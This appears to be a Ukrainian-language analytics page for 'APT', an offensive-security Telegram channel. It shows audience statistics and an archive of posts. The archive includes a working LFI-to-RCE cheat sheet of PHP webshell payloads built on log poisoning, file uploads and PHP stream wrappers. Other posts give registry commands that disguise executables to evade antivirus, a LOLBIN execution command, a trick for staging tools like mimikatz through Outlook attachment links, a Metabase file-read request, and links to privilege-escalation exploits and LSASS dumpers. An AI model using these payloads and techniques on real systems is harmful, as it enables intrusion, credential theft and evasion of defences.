APT

Відкрити в Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Росія45 554 Технології та додатки8 834...

📈 Аналітичний огляд Telegram-каналу APT

Канал APT (@apt_notes) у мовному сегменті Англійська є активним учасником. На даний момент спільнота об'єднує 14 682 підписників, посідаючи 8 834 місце в категорії Технології та додатки та 45 554 місце у регіоні Росія.

📊 Показники аудиторії та динаміка

З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 14 682 підписників.

За останніми даними від 13 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 414, а за останні 24 години на 17, загальне охоплення залишається високим.

Статус верифікації: Не верифікований
Рівень залученості (ER): Середній показник залученості аудиторії становить 50.76%. Протягом перших 24 годин після публікації контент зазвичай збирає N/A% реакцій від загальної кількості підписників.
Охоплення публікацій: В середньому кожен допис отримує 7 449 переглядів. Протягом першої доби публікація в середньому набирає 0 переглядів.
Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 20.

📝 Опис та контентна політика

Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Завдяки високій частоті оновлень (останні дані отримано 14 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.

14 682

Підписники

+1724 години

+1027 днів

+41430 день

7 449

Перегляди допису

Немає даних24 години

Немає даних48 годин

50.76%

Коефіцієнт залучення

Немає даних

Дописів на день

Ads index

beta

Архів дописів

14 682

WindowsMDMLPE — CVE-2021-24084 # https://github.com/ohnonoyesyes/CVE-2021-24084 # https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html #mdm #lpe #cve

14 682

Achieving LFI to RCE 1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls

3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<test@example

.com

>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls

4. Image Upload

exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls

5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

6. php://filter Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE

php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding 7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

8. data://text/plain

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

9. /proc/self/fd/{id} Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id} 10. expect://

/show.php?page=expect://ls

11. input://

POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>

12. RCE via vulnerable assert statement Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!"); Payload: ' and die(system("whoami")) or ' 13. Log files

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc) 14. Via PHP sessions https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ 15. Via SSH If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa 16. vsftpd Log Poisoning Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log 17. Automation https://github.com/D35m0nd142/LFISuite #lfi #rce #cheatsheet

14 682

$LOLBIN(s): mpiexec.exe & smpd.exe Path: C:\Program Files\Microsoft MPI\Bin mpiexec.exe spawns smpd.exe which then spawns an e$

LOLBIN(s): mpiexec.exe & smpd.exe Path:

C:\Program Files\Microsoft MPI\Bin

mpiexec.exe spawns smpd.exe which then spawns an executable. Usage:

mpiexec.exe -n 1 c:\path\to\binary.exe

#lolbin #mpiexec #redteam

14 682

LOLBIN(s): mpiexec.exe & smpd.exe Path: C:\Program Files\Microsoft MPI\Bin mpiexec.exe spawns smpd.exe which then spawns an executable. Usage: mpiexec.exe -n 1 c:\path\to\binary.exe

14 682

CVE-2021-43267 — Linux TIPC (PoC) An article on how to escalate privileges via the slab-buffer-overflow in the Transparent Inter-Process Communication (TIPC) module. Reference: https://haxx.in/posts/pwning-tipc/ PoC: https://github.com/ohnonoyesyes/CVE-2021-43267 #poc #cve #linux #lpe

14 682

EfsPotato MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability https://github.com/zcgonvh/EfsPotato #potato #seImpersonateprivilege #lpe

14 682

Hunting for Persistence in Linux # https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/ # https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/ #blueteam #redteam #DFIR #security

14 682

4-ZERO-3 Tool to bypass 403/401. This script contain all the possible techniques to do the same. https://github.com/Dheerajmadhukar/4-ZERO-3 #forbidden #bypass #bugbounty

14 682

CVE Trends CVE Trends gathers crowdsourced intel about CVEs from Twitter's filtered stream API and combines it with data from NIST's NVD and GitHub APIs. https://cvetrends.com #cve #trends #monitor

14 682

https://twitter.com/_CPResearch_/status/1463104303770578944

14 682

Outlook Attachments Attackers can compose an email on Outlook (or O365) and attach a file and then use the file's download link to directly download the file. Restricted file types would first need to have their file extension modified (e.g. mimikatz.exe becomes mimikatz.exe.txt) and then upon download the file extension is modified back to the original extension.

1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment.outlook.live.net or attachment.office.net)

Link is valid for ~15 minutes. #outlook #attachments #redteam #phishing

14 682

pyKerbrute Use Python to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication (supports Pass-the-Hash) https://github.com/3gstudent/pyKerbrute #ad #kerberos #spray

14 682

Clipboard Shellcode Injection https://gist.github.com/Wra7h/69a03c802ae6977e74b1152a4b004515 #clipboard #shellcode #injection #redteam #maldev

14 682

Picky PPID Spoofing Parent Process ID (PPID) Spoofing is one of the techniques employed by malware authors to blend in the target system. This is done by making the malicious process look like it was spawned by another process. This helps evade detections that are based on anomalous parent-child process relationships. https://capt-meelo.github.io//redteam/maldev/2021/11/22/picky-ppid-spoofing.html #pid #spoofing #redteam #maldev #malware

14 682

InfoSec BlackFriday Offers - Books - Courses - Services - Software - Hardware https://github.com/0x90n/InfoSec-Black-Friday #BlackFriday #InfoSec

14 682

DumpNParse DumpNParse is a tool that will automatically dump LSASS and parse the results. https://github.com/icyguider/DumpNParse #lsass #dump #parse

14 682

Windows installer LPE 0day https://github.com/klinix5/InstallerFileTakeOver #windows #lpe #0day

14 682

Bypass AV via Change Filenames/Extension You need to change the files extension: .eyb files as .exe .faq files as

.dll

Use the following commands:

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /ve /t REG_SZ /d exefile
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb /f /v "Content Type" /t REG_SZ /d "application/x-msdownload"

This can also work on other security solutions and for many other blacklisted techniques. #av #evasion #extension #file

14 682

Microsoft Exchange Server RCE (PoC) This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 #exchange #rce #poc

14 682

CVE-2021-41277 MetaBase Arbitrary File Read PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

#metabase #cve #poc